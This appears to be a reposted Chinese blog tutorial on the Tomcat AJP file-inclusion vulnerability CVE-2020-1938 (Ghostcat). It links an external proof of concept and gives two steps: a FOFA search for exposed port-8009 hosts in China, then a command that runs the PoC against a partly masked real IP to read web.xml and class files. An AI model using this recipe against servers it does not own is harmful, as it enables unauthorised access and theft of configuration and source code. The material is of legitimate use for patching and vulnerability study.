Tomcat AJP协议文件包含漏洞(CVE-2020-1938)
Posted dgjnszf
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Tomcat AJP协议文件包含漏洞(CVE-2020-1938)相关的知识,希望对你有一定的参考价值。
Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapps目录下的任意文件,但不能跨到上级目录。
PoC来自GitHub:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
第一步:利用FOFA搜索8009端口
port="8009" && country="CN"
第二步:运行PoC
python2.7 CNVD-2020-10487-Tomcat-Ajp-lfi.py 151.*.*.114 -p 8009 -f /WEB-INF/web.xml
1.读取web.xml
2.读取*.class文件
以上是关于Tomcat AJP协议文件包含漏洞(CVE-2020-1938)的主要内容,如果未能解决你的问题,请参考以下文章
Tomcat Ghostcat - AJP协议文件读取/文件包含漏洞
一文详解Tomcat Ghostcat-AJP协议文件读取/文件包含漏洞(CVE-2020-1938)
(CVE-2020-1938)Apache Tomcat AJP文件包含漏洞复现